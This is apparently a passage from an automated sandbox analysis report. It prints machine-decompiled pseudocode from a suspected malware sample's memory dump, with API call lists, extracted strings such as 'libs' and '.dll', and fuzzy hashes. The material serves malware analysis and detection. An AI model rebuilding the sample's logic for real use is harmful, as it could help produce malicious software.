					_t167 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t308) + _t165);
					_v28 = _t167;
					_t339 =  *((intOrPtr*)( *0x40e18c))(_t308,  *0x40e20c);
					if(_t339 == 0) {
						L27:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v24);
						LocalFree(_v20);
						LocalFree(_t226);
						LocalFree(_v28);
						goto L40;
					}
					_t341 = _t339 - _t308 >> 1;
					if(E0040A3E4(_t308,  &_v28, 0, _t341) == 0) {
						goto L27;
					}
					_t229 = _t308 + (_t341 + 1) * 2;
					_v48 =  *_v28 & 0x0000ffff;
					_push( *((intOrPtr*)( *0x40e08c))(_t229) + _t179);
					_t309 = 0x40;
					_t181 = LocalAlloc(_t309, ??);
					_push( *0x40e228);
					_t344 = _t181;
					_push(_t229);
					_v36 = _t344;
					if( *((intOrPtr*)( *0x40e18c))() == 0) {
						L26:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v24);
						LocalFree(_v20);
						LocalFree(_v32);
						LocalFree(_v28);
						LocalFree(_t344);
						goto L40;
					}
					if(E0040A3E4(_t229,  &_v36, 0, _t182 - _t229 >> 1) == 0) {
						_t344 = _v36;
						goto L26;
					}
					_v40 = _v40 & 0x00000000;
					_t194 = LocalAlloc(_t309, 0x28000); // executed
					_t345 = _t194;
					_v52 = _t345;
					_t195 =  *((intOrPtr*)( *0x40e074))(_v24);
					_push( &_v40);
					_push(_t345);
					_t289 = 0x31;
					_push(0 | _v48 == _t289);
					_push(0 | _v44 == _t289);
					_push(_t195);
					_push(_v20);
					_push(_v16);
					_push(_v12);
					E00405FEB(_v36, _v8); // executed
					_t348 = _t348 + 0x20;
					if(_v40 > 0) {
						_t209 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
						_t210 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
						_t291 = 0x10;
						_t211 = E0040A05F(_t209, _t291);
						_v48 = _t211;
						_t212 =  *((intOrPtr*)( *0x40e13c))(_t210,  *0x40e210);
						_t311 = _v48;
						_t213 = E0040A503(_t212, _t311);
						_t274 =  *0x40e204; // 0x5f5980
						_v60 = _v60 & 0x00000000;
						_v64 = _t274;
						_v48 = _t213;
						_t214 = E00408619( &_v48);
						_v44 = _t214;
						_t347 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
						 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, 0, 0, 0, 0);
						if(0 != 0) {
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, _t347, 0, 0, 0);
							if(0 != 0) {
								E00407EDB(_v56, _t347, 0, 0, _v40, _v52, _v44,  &_v64);
								_t348 = _t348 + 0x18;
							}
						}
						LocalFree(_t347);
						LocalFree(_v44);
						LocalFree(_v48);
						LocalFree(_t311);
						_t345 = _v52;
					}
					LocalFree(_t345); // executed
					LocalFree(_v8);
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					LocalFree(_v32);
					LocalFree(_v28);
					LocalFree(_v36);
					_t295 =  *((intOrPtr*)( *0x40e18c))(_t229,  *0x40e250);
					if(_t295 != 0) {
						continue;
					} else {
						goto L41;
					}
				}
				LocalFree(_t226);
				goto L40;
			}

0x004055c8
0x004055ce
0x004055d2
0x00405b56
0x00405b5a
0x00405b5a
0x004055da
0x004055df
0x004055f0
0x004055fe
0x00405601
0x00405606
0x0040560a
0x00000000
0x00000000
0x00405615
0x00405625
0x00405b4a
0x00000000
0x00405b4a
0x00405639
0x00405644
0x00405652
0x00405655
0x0040565a
0x0040565e
0x00405b45
0x00405ae5
0x00405ae5
0x00000000
0x00405ae5
0x00405669
0x00405679
0x00405b42
0x00000000
0x00405b42
0x0040568d
0x00405698
0x004056a6
0x004056a9
0x004056ae
0x004056b2
0x00405b34
0x00405b37
0x00405ae5
0x00000000
0x00405ae5
0x004056bd
0x004056cd
0x00405b31
0x00000000
0x00405b31
0x004056e1
0x004056ec
0x004056fa
0x004056fd
0x00405702
0x00405706
0x00405b13
0x00405b16
0x00405b1f
0x00405b26
0x00405b4e
0x00405b4e
0x00405b54
0x00000000
0x00405b55
0x00405711
0x00405721
0x00405b10
0x00000000
0x00405b10
0x00405735
0x00405740
0x0040574e
0x00405751
0x00405756
0x0040575a
0x00405af0
0x00405af3
0x00405afc
0x00405b05
0x00405ae5
0x00000000
0x00405ae5
0x00405765
0x00405775
0x00405aed
0x00000000
0x00405aed
0x00405789
0x00405794
0x004057a2
0x004057a5
0x004057aa
0x004057ae
0x00405abe
0x00405ac1
0x00405aca
0x00405ad3
0x00405adc
0x00405ae5
0x00000000
0x00405ae5
0x004057b9
0x004057c0
0x004057c5
0x004057cc
0x00000000
0x00000000
0x004057de
0x004057e1
0x004057f1
0x00405800
0x00405805
0x00405809
0x00405a82
0x00405a85
0x00405a8e
0x00405a97
0x00405aa0
0x00405aa9
0x00405ab0
0x00405b4e
0x00000000
0x00405b4e
0x00405814
0x00405824
0x00000000
0x00000000
0x00405831
0x0040583a
0x00405847
0x0040584a
0x0040584c
0x0040584e
0x0040585a
0x0040585c
0x0040585d
0x00405864
0x00405a3d
0x00405a40
0x00405a49
0x00405a52
0x00405a5b
0x00405a64
0x00405a6d
0x00405a76
0x00405b4e
0x00000000
0x00405b4e
0x0040587f
0x00405a3a
0x00000000
0x00405a3a
0x0040588a
0x00405894
0x0040589f
0x004058a1
0x004058a4
0x004058a9
0x004058aa
0x004058ad
0x004058b7
0x004058c4
0x004058c8
0x004058c9
0x004058cc
0x004058cf
0x004058d2
0x004058d7
0x004058de
0x004058ef
0x004058ff
0x00405903
0x00405908
0x0040591a
0x0040591d
0x0040591f
0x00405926
0x0040592b
0x00405931
0x00405935
0x0040593b
0x0040593e
0x00405950
0x0040595b
0x0040596c
0x00405970
0x00405987
0x0040598b
0x004059a3
0x004059a8
0x004059a8
0x0040598b
0x004059ac
0x004059b5
0x004059be
0x004059c5
0x004059cb
0x004059cb
0x004059cf
0x004059d8
0x004059e1
0x004059ea
0x004059f3
0x004059fc
0x00405a05
0x00405a0e
0x00405a17
0x00405a2b
0x00405a2f
0x00000000
0x00405a35
0x00000000
0x00405a35
0x00405a2f
0x00405b4e
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 004055F0
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B4E

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalAlloc.KERNEL32(00000040,00000000), ref: 00405644
LocalAlloc.KERNEL32(00000040,00000000), ref: 00405698
LocalAlloc.KERNEL32(00000040,00000000), ref: 004056EC
LocalAlloc.KERNEL32(00000040,00000000), ref: 00405740
LocalAlloc.KERNEL32(00000040,00000000), ref: 00405794
LocalAlloc.KERNEL32(00000040,00000000), ref: 004057F1
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040584C
LocalAlloc.KERNEL32(00000040,00028000), ref: 00405894

Part of subcall function 00405FEB: lstrlenW.KERNEL32(005F5760,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137

LocalFree.KERNEL32(00000000), ref: 004059AC
LocalFree.KERNEL32(?), ref: 004059B5
LocalFree.KERNEL32(?), ref: 004059BE
LocalFree.KERNEL32(?), ref: 004059C5

Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,0000C350,?,00000000,00000001,?,?,?,?,?,00409B89,00000001,?,00000000,00000000,?), ref: 00407EF5
Part of subcall function 00407EDB: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00409B89,00000001,?,00000000), ref: 00407F9B

LocalFree.KERNELBASE(00000000), ref: 004059CF
LocalFree.KERNEL32(00407BAF), ref: 004059D8
LocalFree.KERNEL32(?), ref: 004059E1
LocalFree.KERNEL32(?), ref: 004059EA
LocalFree.KERNEL32(?), ref: 004059F3
LocalFree.KERNEL32(?), ref: 004059FC
LocalFree.KERNEL32(?), ref: 00405A05
LocalFree.KERNEL32(?), ref: 00405A0E
LocalFree.KERNEL32(?), ref: 00405A17

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

Part of subcall function 00408619: LocalAlloc.KERNEL32(00000040,0000FF78,00000000,00407870), ref: 00408628

LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A40
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A49
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A52
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A5B
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A64
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A6D
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A76
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A85
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A8E
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A97
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA0
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AB0
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AC1
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ACA
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AD3
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ADC
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AE5
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AF3
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AFC
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B05
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B16
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B1F
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B26
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B37

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$lstrlen$Global
String ID:
API String ID: 2107727554-0
Opcode ID: bc2cdf2b12de0207c498242e04472333c73d43491dab4f7ea7acdd9505ac9720
Instruction ID: f35946c0f576b0545b5d2f7ca60a1d17271964e093f6211ee75f8335e655f3b5
Opcode Fuzzy Hash: bc2cdf2b12de0207c498242e04472333c73d43491dab4f7ea7acdd9505ac9720
Instruction Fuzzy Hash: E1F1C372900225EFDB149BA6DE48EAEBB75EB48310F044535F905B32A0DB746D21CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040864C Relevance: 34.7, APIs: 18, Strings: 5, Instructions: 247
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0040864C(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t55;
				void* _t61;
				void* _t64;
				void* _t73;
				void* _t74;
				signed int _t81;
				void* _t83;
				void* _t90;
				signed int _t91;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t104;
				void* _t106;
				void* _t107;
				signed int _t111;
				void* _t112;
				void* _t113;
				void* _t115;
				void* _t122;
				signed int _t137;
				intOrPtr _t146;
				void* _t150;
				void* _t152;

				_t115 = __ecx;
				_v32 = __edx;
				_t152 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(__ecx) + _t45);
				_push(_t115);
				_v12 = _t152;
				if( *((intOrPtr*)( *0x40e08c))() == 0x26) {
					L25:
					if(_t152 != 0) {
						LocalFree(_t152); // executed
					}
					return 1;
				} else {
					goto L1;
				}
				do {
					L1:
					_t55 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t53); // executed
					_v8 = _t55;
					_t150 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t56);
					_v16 = _t150;
					_t61 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t115) + _t59);
					_t152 = _t61;
					_v24 = _t152;
					_t122 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1ec);
					_t63 = 0;
					_v28 = 0;
					if(_t122 == 0) {
						L3:
						_t8 =  &_v8; // 0x4079e3
						_t64 = E0040A3E4(_t115, _t8, 0, _t63); // executed
						if(_t64 != 1) {
							goto L17;
						}
						_t73 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228);
						_v20 = _t73;
						if(_t73 == 0) {
							_t74 = _v12;
							if(_t74 != 0) {
								LocalFree(_t74);
							}
							if(_v8 != 0) {
								LocalFree(_v8);
							}
							if(_t150 != 0) {
								LocalFree(_t150);
							}
							goto L25;
						}
						_push(L"libs");
						_t10 =  &_v8; // 0x4079e3
						_push( *_t10);
						if( *((intOrPtr*)( *0x40e114))() != 0) {
							goto L17;
						}
						_t115 = _t115 + _v28 * 2 + 2;
						_t81 = _v20 - _t115;
						_v20 = _t81 >> 1;
						if(_t81 == 0) {
							L33:
							_t83 = _v12;
							if(_t83 != 0) {
								LocalFree(_t83);
							}
							if(_v8 == 0) {
								L38:
								if(_t150 != 0) {
									LocalFree(_t150);
								}
								if(_t152 != 0) {
									LocalFree(_t152);
								}
								return 0;
							} else {
								LocalFree(_v8);
								L37:
								goto L38;
							}
						}
						_t90 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e1f0);
						if(_t90 == 0) {
							goto L33;
						}
						_t91 = _t90 - _t115;
						_t92 = _t91 >> 1;
						_v28 = _t91 >> 1;
						if(_t91 == 0) {
							goto L33;
						}
						if(E0040A3E4(_t115,  &_v16, 0, _t92) == 0) {
							L16:
							_t150 = _v16;
							goto L17;
						}
						if(E0040A3E4(_t115,  &_v24, _v28 + 1, _v20) == 0) {
							_t152 = _v24;
							goto L16;
						}
						_t100 = E0040A503( *((intOrPtr*)( *0x40e044))(0x40, 0x208), _v32);
						_t146 =  *0x40e258; // 0x5f5740
						_t101 = E0040A503(_t100, _t146);
						_t150 = _v16;
						_t103 = E0040A503(E0040A503(_t101, _t150), L".dll");
						_t137 =  *0x40e374; // 0x60e1f0
						_v28 = _t137;
						_v20 = _t103;
						_t104 = E00408619( &_v28);
						_t152 = _v24;
						_v28 = _t104;
						E00408495(_t152, _t104, _t103); // executed
						_t106 = _v28;
						if(_t106 != 0) {
							LocalFree(_t106);
						}
						_t107 = _v20;
						if(_t107 != 0) {
							LocalFree(_t107);
						}
						goto L17;
					}
					_t111 = _t122 - _t115;
					_t63 = _t111 >> 1;
					_v28 = _t111 >> 1;
					if(_t111 < 0) {
						_t112 = _v12;
						if(_t112 != 0) {
							LocalFree(_t112);
						}
						_t37 =  &_v8; // 0x4079e3
						_t113 =  *_t37;
						if(_t113 == 0) {
							goto L38;
						} else {
							LocalFree(_t113);
							goto L37;
						}
					}
					goto L3;
					L17:
					if(_v8 != 0) {
						LocalFree(_v8);
					}
					if(_t150 != 0) {
						LocalFree(_t150);
					}
					if(_t152 != 0) {
						LocalFree(_t152); // executed
					}
					_t34 =  *((intOrPtr*)( *0x40e18c))(_t115,  *0x40e228) + 2; // 0x2
					_t115 = _t34;
					_push(_t115);
				} while ( *((intOrPtr*)( *0x40e08c))() != 0x26);
				_t152 = _v12;
				goto L25;
			}

0x0040865f
0x00408663
0x00408675
0x00408677
0x00408678
0x00408680
0x00408888
0x0040888a
0x0040888d
0x0040888d
0x00000000
0x00000000
0x00000000
0x00000000
0x00408686
0x00408686
0x00408699
0x004086a8
0x004086ba
0x004086c3
0x004086cd
0x004086db
0x004086de
0x004086e3
0x004086e5
0x004086e7
0x004086ec
0x004086fd
0x00408700
0x00408705
0x0040870f
0x00000000
0x00000000
0x00408721
0x00408723
0x00408728
0x004088ea
0x004088ef
0x004088f2
0x004088f2
0x004088fc
0x00408901
0x00408901
0x00408909
0x00408910
0x00408910
0x00000000
0x00408909
0x00408734
0x00408739
0x00408739
0x00408740
0x00000000
0x00000000
0x0040874f
0x00408752
0x00408756
0x00408759
0x004088b3
0x004088b3
0x004088b8
0x004088bb
0x004088bb
0x004088c5
0x004088d0
0x004088d2
0x004088d5
0x004088d5
0x004088dd
0x004088e0
0x004088e0
0x00000000
0x004088c7
0x004088ca
0x004088ca
0x00000000
0x004088ca
0x004088c5
0x0040876b
0x0040876f
0x00000000
0x00000000
0x00408775
0x00408777
0x00408779
0x0040877c
0x00000000
0x00000000
0x00408793
0x0040883b
0x0040883b
0x00000000
0x0040883b
0x004087b0
0x00408838
0x00000000
0x00408838
0x004087c9
0x004087ce
0x004087d6
0x004087db
0x004087ee
0x004087f3
0x004087fb
0x00408801
0x00408804
0x0040880a
0x00408811
0x00408814
0x00408819
0x0040881f
0x00408822
0x00408822
0x00408828
0x0040882d
0x00408830
0x00408830
0x00000000
0x0040882d
0x004086f0
0x004086f2
0x004086f4
0x004086f7
0x0040889b
0x004088a0
0x004088a3
0x004088a3
0x004088a9
0x004088a9
0x004088ae
0x00000000
0x004088b0
0x004088ca
0x00000000
0x004088ca
0x004088ae
0x00000000
0x0040883e
0x00408842
0x00408847
0x00408847
0x0040884f
0x00408852
0x00408852
0x0040885a
0x0040885d
0x0040885d
0x00408871
0x00408871
0x00408879
0x0040887c
0x00408885
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 0040866D
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 00408699
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086B2
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,004079E3), ref: 004086CD
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408822
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 00408830
LocalFree.KERNEL32(00000000), ref: 00408847
LocalFree.KERNEL32(00000000), ref: 00408852
LocalFree.KERNELBASE(00000000), ref: 0040885D
LocalFree.KERNELBASE(00000000,?,?,?,?,?,?,004079E3), ref: 0040888D
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088A3
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088BB
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088CA
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088D5
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,004079E3), ref: 004088E0
LocalFree.KERNEL32(?,?,?,?,?,?,?,004079E3), ref: 004088F2
LocalFree.KERNEL32(00000000), ref: 00408901
LocalFree.KERNEL32(00000000), ref: 00408910

Strings

@W_, xrefs: 004087CE
libs, xrefs: 00408734
.dll, xrefs: 004087E7
y@, xrefs: 00408844, 004088FE
y@, xrefs: 00408700, 00408739, 004088A9, 004088B0

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc
String ID: .dll$@W_$libs$y@$y@
API String ID: 3098330729-4229355819
Opcode ID: bf2ea1e081e254e173b5b4746a9bb4eb2339d757bb692ecf6b78c51b06636b50
Instruction ID: 52a9afaef70bc3ab584d26b5193ec900674cb85d6b4cf00b99d66efe4c6f1661
Opcode Fuzzy Hash: bf2ea1e081e254e173b5b4746a9bb4eb2339d757bb692ecf6b78c51b06636b50
Instruction Fuzzy Hash: EE818672A002159BDB04EFA5DF85A6E77B8AB44310B44483EE941F7390DF78ED11CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7DA Relevance: 31.6, APIs: 25, Instructions: 347
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 30%

			E0040A7DA(short* __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				void* _v44;
				short* _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				char _v64;
				void* __ecx;
				void* _t80;
				signed int _t81;
				void* _t84;
				void* _t88;
				void* _t91;
				void* _t94;
				void* _t116;
				void* _t120;
				void* _t136;
				void* _t139;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				void* _t150;
				void* _t161;
				void* _t162;
				void* _t163;
				intOrPtr _t164;
				char _t206;
				void* _t219;
				void* _t228;
				signed int _t231;
				intOrPtr _t232;
				void* _t235;
				void* _t242;
				signed int _t246;
				signed int _t249;
				void* _t250;
				void* _t251;
				void* _t253;
				void* _t254;

				_v48 = __edx;
				_v28 = _t164;
				_t161 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e2a4);
				if(_t161 == 0) {
					L24:
					return 0;
				}
				while(1) {
					_t162 = _t161 + 0xa;
					_t80 =  *((intOrPtr*)( *0x40e18c))(_t162,  *0x40e1f0);
					_t3 = _t80 + 2; // 0x2
					_t224 = _t3;
					_t81 =  *((intOrPtr*)( *0x40e18c))(_t3,  *0x40e1e8);
					_v36 = _t81;
					_t84 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t82);
					_v8 = _t84;
					_t88 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t86);
					_v12 = _t88;
					_t91 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t89);
					_v16 = _t91;
					_t94 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t92);
					_v20 = _t94;
					_t242 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_v28) + _t95);
					_t100 = _v36 - _t162 >> 1;
					_v24 = _t242;
					_v44 = _v36 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v8, _t224 - _t162 >> 1, _t100) == 0) {
						break;
					}
					_t228 =  *((intOrPtr*)( *0x40e18c))(_v36 + 2,  *0x40e1e8);
					_t246 = _t228 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v12, _v44 + 1, _t246) == 0) {
						L20:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						LocalFree(_v24);
						L22:
						L23:
						goto L24;
					}
					_t21 = _t228 + 2; // 0x2
					_t116 =  *((intOrPtr*)( *0x40e18c))(_t21,  *0x40e1e8);
					_v44 = _t116;
					_t23 = _t246 + 1; // 0x1
					_t231 = _t116 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v16, _t23, _t231) == 0) {
						goto L20;
					}
					_t120 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e1e8);
					_v44 = _t120;
					_t27 = _t231 + 1; // 0x1
					_t249 = _t120 - _t162 >> 1;
					if(E0040A3E4(_t162,  &_v20, _t27, _t249) == 0) {
						goto L20;
					}
					_t232 =  *((intOrPtr*)( *0x40e18c))(_v44 + 2,  *0x40e228);
					_v56 = _t232;
					_t32 = _t249 + 1; // 0x1
					if(E0040A3E4(_t162,  &_v24, _t32, _t232 - _t162 >> 1) == 0) {
						goto L20;
					}
					_t250 =  *((intOrPtr*)( *0x40e074))(_v12);
					if(_t250 > 0) {
						_t163 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
						_t136 =  *((intOrPtr*)( *0x40e0c4))(0, _t163, _t250, 0); // executed
						if(_t136 != 0) {
							_t139 =  *((intOrPtr*)( *0x40e000))(_t163, _t163, _v16);
							_v36 = _v36 & 0x00000000;
							_t163 = _t139;
							_v32 =  *((intOrPtr*)( *0x40e044))(0x40, 0x2000);
							E0040B177(_v8, _t163, _t163, _v20, _v24, _t141,  &_v36); // executed
							_t254 = _t254 + 0x14;
							if(_v36 <= 0) {
								_t251 = _v32;
							} else {
								_t145 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t146 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t219 = 0x10;
								_t147 = E0040A05F(_t145, _t219);
								_t253 = _t147;
								_v52 = _t253;
								_t149 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t146,  *0x40e210), _t253);
								_t206 =  *0x40e204; // 0x5f5980
								_v60 = _v60 & 0x00000000;
								_v64 = _t206;
								_v44 = _t149;
								_t150 = E00408619( &_v44);
								_v40 = _t150;
								_t235 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, 0, 0, 0, 0);
								if(0 == 0) {
									_t251 = _v32;
								} else {
									 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t253, 0xffffffff, _t235, 0, 0, 0);
									_t251 = _v32;
									if(0 != 0) {
										E00407EDB(_v48, _t235, 0, 0, _v36, _t251, _v40,  &_v64);
										_t254 = _t254 + 0x18;
									}
								}
								LocalFree(_t235);
								LocalFree(_v40);
								LocalFree(_v44);
								LocalFree(_v52);
								_t232 = _v56;
							}
							LocalFree(_t251);
						}
						LocalFree(_t163);
					}
					LocalFree(_v8);
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					_t66 = _t232 + 2; // 0x2
					_t161 =  *((intOrPtr*)( *0x40e18c))(_t66,  *0x40e2a4);
					if(_t161 != 0) {
						continue;
					} else {
						goto L23;
					}
				}
				LocalFree(_v8);
				LocalFree(_v12);
				LocalFree(_v16);
				LocalFree(_v20);
				LocalFree(_t242);
				goto L22;
			}

0x0040a7ec
0x0040a7f0
0x0040a7f5
0x0040a7f9
0x0040abd3
0x0040abd7
0x0040abd7
0x0040a801
0x0040a80c
0x0040a810
0x0040a81e
0x0040a81e
0x0040a822
0x0040a833
0x0040a83d
0x0040a848
0x0040a857
0x0040a868
0x0040a872
0x0040a883
0x0040a88d
0x0040a89e
0x0040a8aa
0x0040a8b8
0x0040a8be
0x0040a8c1
0x0040a8cd
0x00000000
0x00000000
0x0040a8ee
0x0040a8f4
0x0040a904
0x0040ab7d
0x0040ab80
0x0040ab89
0x0040ab92
0x0040ab9b
0x0040abcb
0x0040abcb
0x0040abd1
0x00000000
0x0040abd2
0x0040a916
0x0040a91a
0x0040a91e
0x0040a923
0x0040a926
0x0040a938
0x00000000
0x00000000
0x0040a951
0x0040a955
0x0040a95a
0x0040a95d
0x0040a96f
0x00000000
0x00000000
0x0040a98a
0x0040a991
0x0040a999
0x0040a9a8
0x00000000
0x00000000
0x0040a9b8
0x0040a9bc
0x0040a9d7
0x0040a9df
0x0040a9e3
0x0040a9f3
0x0040a9f5
0x0040a9f9
0x0040aa0c
0x0040aa1d
0x0040aa22
0x0040aa29
0x0040ab21
0x0040aa2f
0x0040aa3c
0x0040aa49
0x0040aa4d
0x0040aa52
0x0040aa63
0x0040aa66
0x0040aa6f
0x0040aa74
0x0040aa7a
0x0040aa7e
0x0040aa84
0x0040aa87
0x0040aa99
0x0040aaa4
0x0040aab5
0x0040aab9
0x0040aaf7
0x0040aabb
0x0040aad0
0x0040aad2
0x0040aad7
0x0040aaed
0x0040aaf2
0x0040aaf2
0x0040aad7
0x0040aafb
0x0040ab04
0x0040ab0d
0x0040ab16
0x0040ab1c
0x0040ab1c
0x0040ab25
0x0040ab25
0x0040ab2c
0x0040ab2c
0x0040ab35
0x0040ab3e
0x0040ab47
